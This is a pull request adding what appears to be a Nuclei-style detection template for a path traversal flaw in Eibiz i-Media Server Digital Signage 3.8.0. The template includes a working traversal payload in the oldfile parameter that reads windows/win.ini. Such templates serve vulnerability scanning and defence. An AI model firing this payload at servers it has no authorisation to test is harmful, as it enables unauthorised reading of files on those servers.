### PR TITLE
Create eibiz-server-3-8-0-lfi.yaml

### DIFF
--- a/eibiz-server-3-8-0-lfi.yaml
+++ b/eibiz-server-3-8-0-lfi.yaml
@@ -1,0 +1,23 @@
+id: eibiz-server-3-8-0-lfi
+
+info:
+  name: Eibiz i-Media Server Digital Signage 3.8.0 File Path Traversal
+  author: 0x_akoko
+  severity: high
+  description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
+  tags: windows,lfi,eibiz
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body

--- a/vulnerabilities/other/eibiz-lfi.yaml
+++ b/vulnerabilities/other/eibiz-lfi.yaml
@@ -1,10 +1,11 @@
-id: eibiz-server-3-8-0-lfi
+id: eibiz-lfi
 
 info:
   name: Eibiz i-Media Server Digital Signage 3.8.0 File Path Traversal
   author: 0x_akoko
   severity: high
   description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
+  reference: https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
   tags: windows,lfi,eibiz
 
 requests:
@@ -12,12 +13,11 @@ requests:
     path:
       - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
 
-    stop-at-first-match: true
     matchers:
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body


### PR DESCRIPTION
### Template / PR Information

### Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal

Eibiz i-Media Server Digital Signage version 3.8.0 is affected by a directory traversal vulnerability. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.

Vendor: EIBIZ Co.,Ltd.
Product web page: http://www.eibiz.co.th
Affected version: <=3.8.0
References: https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html

### Template Validation

I've validated this template locally?
- YES